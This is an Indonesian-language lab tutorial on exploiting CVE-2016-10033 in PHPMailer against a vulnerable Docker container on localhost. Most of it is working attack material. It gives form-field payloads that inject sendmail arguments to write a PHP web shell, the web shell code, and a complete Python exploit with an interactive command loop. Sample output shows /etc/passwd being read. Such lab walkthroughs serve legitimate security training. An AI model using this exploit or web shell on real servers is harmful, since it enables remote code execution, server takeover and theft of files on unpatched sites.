PHP Mailer

Clone repositori terlebih dahulu atau unduh melalui Dropbox.

$ git clone https://github.com/opsxcq/exploit-CVE-2016-10033.git

Jalankan Docker sebagai simulasi web yang rentan.

$ docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033

Memerlukan waktu untuk mengunduh berkas Docker, tunggu sampai selesai.

Akses alamat localhost:8080 via browser Anda.

Terdapat form yang terdiri dari name, message, email.

Akhir

Untuk melakukan eksploitasi, isi masing-masing field dengan data dibawah ini.

data = {
    'name': '<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>',
    'email': '\"vulnerables\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @test.com'
    'message': 'Pwned',
    'action': 'submit'
}

Dijelaskan bahwa Attacker bisa menulis kode ke server pada direktori /var/www/backdoor.php dengan kode Shell.

<?php
  echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|";
?>

Berkas tersebut bisa diakses pada browser pada alamat localhost:8080/backdoor.php.

Simulasi

Eksploitasi bisa dilakukan dengan menggunakan Curl atau Python Requests.

Curl

Lihat kode `exploit.sh`,

Python

import requests
import re

def get_middle_string(s, b, e):
    r = r"%s(.*?)%s" % (b,e)
    return re.findall(r,s)

def is_shell_uploaded(filename):
    url = 'http://localhost:8080/'
    data_binary = {
        'name': (None, '<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>'),
        'email': (None, '\"vulnerables\\\" -OQueueDirectory=/tmp -X/www/{} server\" @test.com'.format(filename)),
        'message': (None, 'Pwned'),
        'action': (None, 'submit')
    }

    x = requests.post(
            url=url,
            files=data_binary,
        )

    if x.status_code == 200:
        return True

def interactive_shell(filename, cmd):
    url = 'http://localhost:8080/{}?cmd={}'.format(filename, cmd.encode('base64'))
    x = requests.get(url)
    return get_middle_string(x.text.encode('hex'), 'Message from '.encode('hex'), '|'.encode('hex'))[0].decode('hex')

if __name__ == '__main__':
    filename = 'shell.php'
    cmd = 'whoami'
    interactive_shell(filename, cmd)
    while True:
        cmd = raw_input('[*] Command >>> ')
        print interactive_shell(filename, cmd)

Luaran.

$ python exploit.py 
[*] Command >>> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
smmta:x:104:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:105:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false

[*] Command >>> ls
backdoor.php
index.php
shell.php
vulnerable

[*] Command >>>

PHP Mailer

PHP Mailer

Akhir

Simulasi

results matching ""

No results matching ""